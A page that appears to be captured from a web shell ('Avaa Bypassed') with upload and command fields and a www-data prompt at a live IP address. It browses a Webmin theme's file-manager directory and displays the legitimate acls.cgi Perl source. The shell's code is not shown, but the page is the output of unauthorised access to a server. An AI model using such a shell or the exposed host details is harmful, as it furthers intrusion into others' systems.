[ Avaa Bypassed ]

Upload:

Command:

www-data@3.148.212.53: ~ $ 
#!/usr/bin/perl

#
# Authentic Theme (https://github.com/authentic-theme/authentic-theme)
# Copyright Ilia Rostovtsev <ilia@virtualmin.com>
# Licensed under MIT (https://github.com/authentic-theme/authentic-theme/blob/master/LICENSE)
#
use strict;

use lib ($ENV{'LIBROOT'} . "/vendor_perl");

our (%in, %text, $cwd, $path, @allowed_paths);

do($ENV{'THEME_ROOT'} . "/extensions/file-manager/file-manager-lib.pl");

my %errors;

# Files to work on (arr)
my @files = get_entries_list();

# Action
my $action = $in{'action'};

# Permission
my $perms = $in{'perms'};

# User
my $user = $in{'user'};

# Group
my $group = $in{'group'};

# Recursive
my $recursive = $in{'recursive'} ? " -R" : "";

# Manual
my $extra = $in{'manual'};

# Apply to (arr)
my @apply_to = split(/\0/, $in{'apply_to'});

# Delete doesn't allow perms
$perms = "" if ($action eq '-x');

# Build params
my @types;
foreach my $type (@apply_to) {
    if ($user && $type eq 'u') {
        push(@types, "u:${user}:${perms}");
    }
    if ($group && $type eq 'g') {
        push(@types, "g:${group}:${perms}");
    }
    if ($type =~ /^m|o$/) {
        push(@types, "${type}::${perms}");
    }
}
my $cmd = &has_command('setfacl');
if (!$cmd) {
    $errors{ $text{'error'} } = "$text{'acls_error'}";

} else {
    my $types;
    # Params are not accepted in clear mode
    if ($action ne '-b' && $action ne '-k') {
        $types = quotemeta(join(',', @types)) if (@types);
        if ($extra) {
            my @extra = split(/\s/, $extra);
            @extra = map {quotemeta($_)} @extra;
            $types .= " " . join(' ', @extra);
        }
    }
    my $args = quotemeta($action) . " " . $types . " " . quotemeta($recursive);
    $args =~ s/\s+/ /g;
    $args = &trim($args);

    foreach my $file (@files) {
        my $qfile = quotemeta("$cwd/$file");
        next if (!-r "$cwd/$file");
        my $fullcmd = "$cmd $args $qfile";
        my $out     = &backquote_logged("$fullcmd 2>&1 >/dev/null </dev/null");
        if ($?) {
            $out =~ s/\s+Usage:\ssetfacl.*//g;
            $out =~ s/\s+Try\s`.*//g;
            $out =~ s/.*setfacl.*?:\s+//g;
            $errors{$file} = "\[tt\]$cmd $args $cwd/$file\[/tt\] : $out";
        }
    }
}

redirect_local('list.cgi?path=' . urlize($path) . '&module=filemin' . '&error=' . get_errors(\%errors) . extra_query());

Filemanager

DIR : / usr/ share/ webmin/ authentic-theme/ extensions/ file-manager/
Name Type Size Permission Actions
acls.cgi File 2.29 KB 0755
bookmark.cgi File 948 B 0755
chattr.cgi File 1.14 KB 0755
chcon.cgi File 1.05 KB 0755
chmod.cgi File 3.22 KB 0755
chown.cgi File 1.5 KB 0755
compress.cgi File 3.86 KB 0755
copy.cgi File 613 B 0755
create_file.cgi File 1.4 KB 0755
create_folder.cgi File 1.39 KB 0755
create_symlink.cgi File 1.25 KB 0755
cut.cgi File 612 B 0755
delete.cgi File 3.13 KB 0755
download.cgi File 3.52 KB 0755
extract.cgi File 6.88 KB 0755
fetcher.cgi File 1.28 KB 0755
file-manager-lib.pl File 46.28 KB 0644
file-manager-reinit.min.js File 1.61 KB 0644
file-manager-reinit.min.js.gz File 807 B 0644
file-manager.min.js File 232.28 KB 0644
file-manager.min.js.gz File 49.29 KB 0644
gpg.cgi File 3.87 KB 0755
http_download.cgi File 1.54 KB 0755
list-images.cgi File 7.5 KB 0755
list.cgi File 340 B 0755
paste.cgi File 1.9 KB 0755
purge_trash.cgi File 1.45 KB 0755
rename.cgi File 1.44 KB 0755
search.cgi File 340 B 0755
tree.cgi File 605 B 0755

© 2025 Coded By Avaa Code.